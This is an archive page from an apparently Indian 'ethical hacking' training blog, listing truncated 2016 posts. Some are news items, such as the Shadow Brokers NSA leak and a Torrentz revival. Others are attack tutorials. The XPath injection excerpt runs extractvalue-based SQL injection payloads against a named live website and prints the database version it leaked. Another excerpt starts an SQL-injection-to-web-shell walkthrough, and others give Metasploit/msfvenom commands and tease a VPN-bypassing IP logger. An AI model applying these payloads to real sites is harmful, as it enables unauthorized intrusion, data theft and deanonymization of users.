Yearly Archives: 2016

/2016

NSA HACKED!!! Multiple Hacking Tools And Exploits Leaked Online

 The Shadow Brokers  | Ethical Hacking Training Institute 
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

It seems that the NSA has been hacked. This is being speculated after a group of hackers going by the name “The Shadow Brokers” has claimed to breach an NSA-controlled hacking organization.

The hacking group has  leaked some private hacking tools and […]

By |August 16th, 2016|NSA Hacked|

Torrentz is back online in a new avatar

torrentz | torrentz.eu is back | torrentz.eu | torrentz2.eu

The largest torrent meta-search engine in the world Torrentz.eu after biddding farewell to millions of its users on August 5 is now back in a new avatar.

It made a comeback in the form of torrentz2.eu.

The new domain says that “Torrentz2.eu is a clone of Torrentz, a free, fast and powerful […]

By |August 9th, 2016|torrentz, torrentz.eu is back|

Metasploit basic command guide.

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

msf > use auxiliary/server/socks4
msf > run

**msfvenom**
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode
them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

$ msfvenom –p […]

By |August 9th, 2016|Metasploit|

Pokemon Go banned by Iranian authorities over ‘security’

Pokemon Go Banned | Pokemon Go Hacks And Tricks
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Authorities in Iran have banned the Pokemon Go app because of unspecified “security concerns”.

The decision was taken by the High Council of Virtual Spaces, the official body overseeing online activity.

Iran follows a number of other countries in expressing its worries over security […]

By |August 7th, 2016|Pokemon Go Hacks and Tricks|

How to setup an IP logger that can bypass a VPN

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Today I’m releasing my tutorial on how to setup a WebRTC IP logger. It is capable of bypassing VPNs and few proxies.

Before we get started, here’s what you’re going to need!

Basic Requirements
+ Basic Webhosting Service (and a domain/subdomain obviously)
+ A brain
+ A basic understanding of technology.

Let’s […]

By |August 4th, 2016|Pokemon Go Hacks and Tricks, Tracking Proxy IP|

Network Image Hack.

Ethical Hacking Institute in India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

So there might be a better way of doing this on windows but while I work on my project, this is the best you will get out of me.

You will need

Cain and abel http://www.oxid.it/cain.html
Wireshark https://www.wireshark.org/download.html

To start what you need to do is open Cain […]

By |July 31st, 2016|Hacking, Papers|

INVITATION FOR CYBER CRIME HELPLINE AWARD FUNCTION 2016

CYBER CRIME HELPLINE AWARD

 

We are consolidating “Cyber Crime Helpline Awards” on 31st July, 2016, on the occasion of Information Security Day (4th August) and we as a Cyber Crime Helpline would be felicitating some of the dignitaries who have been successfully helping or assisting to Government Agencies, Public Sectors, IT/ITES Industries, and Educational Organizations also […]

By |July 29th, 2016|CYBER CRIME HELPLINE, CYBER CRIME HELPLINE AWARD|

XPath Injection Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

XPath Injection guide

Credits: Brother Downfall

Extract Value

I’ll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))–

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))–

 

Code:
XPATH syntax error: ‘~5.1.52-log’

You should get your version.

Getting The Tables (Extract Value)

Code:
+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))–

My link […]

By |July 28th, 2016|XPath Injection|

(MySQL injection–Cross Site Scripting–File inclusion) Practical Approach Guide

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Table of Contents

Introduction
 
MySQL injection▸ How does MySQL injection work?
▸ How do our malicious queries get executed?

Cross Site Scripting▸ How does Cross Site Scripting work?
▸ How do our malicious vectors get executed?

File inclusion▸ How does Local & Remote File Inclusion work?
▸ How do we […]

By |July 27th, 2016|Papers|

SQL Injection to shell for beginners

Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Mike

Hello Everyone,

Today, we will see how to upload a shell through SQL injection (+No needed an Admin Panel),

Requirements:

Vulnerable site.
Shell in txt format [Example: http://.com/shell.txt].
Your Brain (;

~~~
Firstly, we need to use order by statement to count the number of columns.
http://.com/index.php?id=1+order+by+1–
http://.com/index.php?id=1+order+by+2–
http://.com/index.php?id=1+order+by+3–
http://.com/index.php?id=1+order+by+4–
We […]

By |July 27th, 2016|Papers|